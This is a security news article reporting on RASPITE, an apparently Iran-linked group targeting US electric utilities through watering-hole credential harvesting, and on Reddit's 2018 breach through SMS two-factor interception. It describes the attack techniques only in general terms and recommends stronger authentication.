A known threat group believed to be based in Iran is trying to gain access to computer infrastructure belonging to U.S. electric utility organizations.
The group, which researchers from industrial control systems (ICS) security firm Dragos track as RASPITE, has been operating since 2017 and has previously targeted organizations from the United States, Middle East, Europe and East Asia. The attack activity against the electric utility sector appears to be more recent and is focused on the United States, the researchers said in a new report.
The group strategically compromises websites that are of interest to its targets and embeds a specifically crafted link that prompts victims’ computers to open SMB connections. This technique allows attackers to harvest Windows credentials and has also been used by other threat actors such as DYMALLOY and ALLANITE.
Using the stolen credentials, attackers deploy scripts that install a malicious service on computers. The service connects back to command-and-control infrastructure run by RASPITE allows hackers to remotely access the infected systems.
“RASPITE’s activity to date currently focuses on initial access operations within the electric utility sector,” the Dragos researchers said in a blog post. “Although focused on ICS-operating entities, RASPITE has not demonstrated an ICS-specific capability to date. This means that the activity group is targeting electric utilities, but there is no current indication the group has the capability of destructive ICS attacks including widespread blackouts like those in Ukraine.”
While Dragos doesn’t link RASPITE to Iran in its report, the company says that the group “maps to a group called LeafMiner by security firm Symantec.” Symantec released a detailed report last month about LeafMiner’s methods of operations and attacks in the Middle East.
According to Symantec, LeafMiner uses publicly available tools and techniques, including proof-of-concepts exploits. For example, it adopted the watering hole credential harvesting technique used by another group called Dragonfly and developed payloads for the Fuzzbunch framework leaked by the Shadow Brokers.
“The group appears to be based in Iran and seems to be eager to learn from and capitalize on tools and techniques used by more advanced threat actors,” Symantec said in its report.
The group’s victims to date include a broad list of government organizations and businesses from various industry verticals in Saudi Arabia, Lebanon, Israel, Kuwait and other countries. Even if its attacks so far have not been destructive, the group’s recent focus on the U.S. energy sector might signal a shift in intentions.
SMS Interception Allowed Attackers to Compromise Reddit Employees
Reddit suffered a data breach in June that resulted in some user information being stolen, the company announced Aug. 1. The breach was the result of some employee accounts being compromised despite being protected by two-factor authentication (2FA).
“On June 19, we learned that between June 14 and June 18, an attacker compromised a few of our employees’ accounts with our cloud and source code hosting providers,” Reddit engineers said. “Already having our primary access points for code and infrastructure behind strong authentication requiring two factor authentication (2FA), we learned that SMS-based authentication is not nearly as secure as we would hope, and the main attack was via SMS intercept. We point this out to encourage everyone here to move to token-based 2FA.”
The fact that SMS is not a secure way of transmitting sensitive information such as authentication codes has been known for years. This is because attackers can use inherent weaknesses in the SS7 protocol, which is used to interconnect telecom operators on the global roaming network, to impersonate subscribers and redirect text messages to devices under their control.
In 2017, attackers exploited SS7 in Germany to intercept SMS-based security codes for online banking accounts and stole money from people. Researchers have also shown how the technique can be used to hack into online Bitcoin wallets.
Reddit was somewhat lucky because attackers only obtained read access to an old database from 2007 that contained usernames, email addresses, hashed passwords and public and private messages. They were also able to access more recent email digests sent to users over a limited period in June, but those only exposed online usernames and email addresses.
Incidents such as this one shouldn’t discourage users and companies from using two-factor authentication. It’s still more secure than using a single password. However, when online services offer alternatives to sending codes over SMS, such as generating them in mobile apps or, even better, with hardware tokens, it’s best to use those other methods.